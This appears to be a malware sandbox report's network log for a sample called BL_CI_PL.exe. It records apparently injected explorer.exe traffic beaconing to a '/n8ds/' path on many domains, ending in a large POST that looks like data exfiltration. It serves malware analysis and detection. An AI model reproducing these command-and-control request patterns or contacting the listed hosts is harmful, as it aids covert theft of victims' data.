                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                    vary: accept-encoding
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 74 6f 70 43 6f 6c 6f 72 73 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 34 35
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:45
                                                                                                                                                    Nov 29, 2021 14:08:52.430877924 CET6444INData Raw: 32 70 78 20 61 75 74 6f 3b 68 65 69 67 68 74 3a 33 70 78 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 43 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 30 70 78 3b
                                                                                                                                                    Data Ascii: 2px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin-top:3px; padding:18px 0px; } .content{ back
                                                                                                                                                    Nov 29, 2021 14:08:52.430958986 CET6445INData Raw: 2d 77 65 69 67 68 74 3a 34 30 30 3b 20 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 64 6f 6d 61 69 6e 2d 63 6f 6c 6f 72 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 23 30 30 38 36 44 35 3b 20 0a 20 20 20 20
                                                                                                                                                    Data Ascii: -weight:400; } .domain-color{ color:#0086D5; } .main-info{ margin-top: 40px; } .main-info li { font-size: 16px; padding: 10px 0;
                                                                                                                                                    Nov 29, 2021 14:08:52.431011915 CET6446INData Raw: 6f 72 73 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 43 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 69 6d 67 20 73 72 63 3d
                                                                                                                                                    Data Ascii: ors"></div> <div class="mainContainer"> <div class="logo"><img src="https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb" alt="Zoho"></div> <div class="content"> <div class="textArea">


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    15192.168.11.204982634.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:09:02.706785917 CET6448OUTGET /n8ds/?lZOD=Jv+KBR9TMcpwNTBIzPqg8qhOh/MOyYoQ7cFMdSYE1xgXhr2Qjx48HBx6QPFrGWZkW9Pq&E0Dpk=l8hHaF HTTP/1.1
                                                                                                                                                    Host: www.palmasdelmarcondos.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:09:02.814063072 CET6449INHTTP/1.1 403 Forbidden
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:09:02 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 275
                                                                                                                                                    ETag: "618be735-113"
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    16192.168.11.2049827216.172.172.8780C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:09:18.060452938 CET6450OUTGET /n8ds/?lZOD=3XBGTKX1IO0m2ps0OCefiLpUWq3mTk3XjxcX7A828ivUAOqw78DSKkuwDvhVWOojGfRi&3fVD2v=9rZXD0c8pBS HTTP/1.1
                                                                                                                                                    Host: www.dietatrintadias.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:09:18.201647043 CET6451INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:09:18 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                    Last-Modified: Tue, 23 Jul 2019 14:50:08 GMT
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 2361
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 39 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 39 32 78 31 39 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 30 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 3e
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x192"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120">
                                                                                                                                                    Nov 29, 2021 14:09:18.201736927 CET6452INData Raw: 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 35 32 2e 70 6e 67 22
                                                                                                                                                    Data Ascii: <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-180.png" sizes="180x180"> <link href="/cgi-sys/css/bootstrap.min.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    17192.168.11.204982888.99.22.580C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:09:23.221726894 CET6453OUTGET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl HTTP/1.1
                                                                                                                                                    Host: www.helpcloud.xyz
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:09:23.236248016 CET6454INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:09:23 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 178
                                                                                                                                                    Connection: close
                                                                                                                                                    Location: https://www.helpcloud.xyz:443/n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    18192.168.11.2049829172.120.157.18780C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:09:28.412970066 CET6454OUTGET /n8ds/?lZOD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&3fVD2v=9rZXD0c8pBS HTTP/1.1
                                                                                                                                                    Host: www.stylesbykee.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:09:28.576642036 CET6455INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:09:24 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 801
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e b3 a4 c9 b3 ce cf b6 d9 bf c6 bc bc b9 c9 b7 dd d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                    Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></head><body><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    19192.168.11.204983066.29.140.18580C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:09:39.069895983 CET6456OUTGET /n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&3fVD2v=9rZXD0c8pBS HTTP/1.1
                                                                                                                                                    Host: www.lopsrental.lease
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:09:39.330734968 CET6457INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:09:39 GMT
                                                                                                                                                    Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                    Content-Length: 282
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    2192.168.11.204984520.124.109.2443C:\Users\user\Desktop\BL_CI_PL.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    20192.168.11.204983134.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:09:58.819690943 CET6460OUTPOST /n8ds/ HTTP/1.1
                                                                                                                                                    Host: www.mummymotors.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 131142
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.mummymotors.com
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://www.mummymotors.com/n8ds/
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate
